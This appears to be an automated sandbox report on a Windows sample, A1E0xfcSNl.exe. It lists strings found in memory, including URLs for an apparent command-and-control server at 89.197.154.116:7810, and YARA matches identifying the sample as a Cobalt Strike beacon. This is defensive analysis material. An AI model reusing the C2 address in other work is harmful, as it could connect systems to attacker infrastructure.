          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2879314585.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2879314585.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ad1b3d16883af
          Source: A1E0xfcSNl.exe, 00000000.00000003.2830432845.00000000039FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c63bb198e70dc
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ddd978b2426bf
          Source: A1E0xfcSNl.exe, 00000000.00000003.2768085189.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806484117.00000000039FE000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2783909509.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2782832541.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2784047530.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2792724674.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2783522079.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2805877584.00000000039FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?eca10e5755dad
          Source: A1E0xfcSNl.exe, 00000000.00000003.2662905991.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673851598.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2663639953.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2662520472.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2651048419.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2651175055.0000000003A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ee3d636b31fbc
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabp
          Source: A1E0xfcSNl.exe, 00000000.00000003.1787137011.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2769115094.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756222341.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756717399.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc
          Source: A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/rueB
          Source: A1E0xfcSNl.exe, 00000000.00000003.2637123523.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2574726157.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2610184152.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2588229355.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625193016.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2587577247.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2597793401.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11987e592c
          Source: A1E0xfcSNl.exe, 00000000.00000003.2735305600.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2719700549.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744211745.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2733333181.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2755824852.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1bd4e00201
          Source: A1E0xfcSNl.exe, 00000000.00000003.2914281384.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?206335be21
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673341320.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3ceef9ea5f
          Source: A1E0xfcSNl.exe, 00000000.00000003.2967121042.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2977577154.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3dd6a9b033
          Source: A1E0xfcSNl.exe, 00000000.00000003.2792724674.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2805877584.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2830837440.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2816663192.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2830350068.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?49417627e6
          Source: A1E0xfcSNl.exe, 00000000.00000003.2840042170.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?69c3c58cd8
          Source: A1E0xfcSNl.exe, 00000000.00000003.2744211745.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9926f10342
          Source: A1E0xfcSNl.exe, 00000000.00000003.2865992163.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2878495999.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ad1b3d1688
          Source: A1E0xfcSNl.exe, 00000000.00000003.2840042170.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2830837440.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2853486155.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2816663192.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2830350068.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c63bb198e7
          Source: A1E0xfcSNl.exe, 00000000.00000003.2768561421.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?eca10e5755
          Source: A1E0xfcSNl.exe, 00000000.00000003.2651000762.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ee3d636b31
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2612763222.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2575316910.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/.net
          Source: A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810//
          Source: A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/SX
          Source: A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/dll
          Source: A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.js
          Source: A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.js-Ce
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.js4
          Source: A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsA
          Source: A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsB
          Source: A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsG2
          Source: A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsKi
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2598576195.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2662520472.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2769115094.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744289857.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756222341.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2855323562.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2663639953.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756717399.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2853918191.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2709742244.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsM9
          Source: A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsP
          Source: A1E0xfcSNl.exe, 00000000.00000003.2879314585.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsZ0
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsb
          Source: A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2709742244.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564242417.00000000039A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564344046.00000000039CD000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2573493710.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2563680413.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jshic
          Source: A1E0xfcSNl.exe, 00000000.00000003.2625443691.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2611121723.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsom
          Source: A1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsoms
          Source: A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jspData
          Source: A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/l
          Source: A1E0xfcSNl.exe, 00000000.00000003.2587345424.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/lla
          Source: A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/m/J
          Source: A1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/m/Z
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/y

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
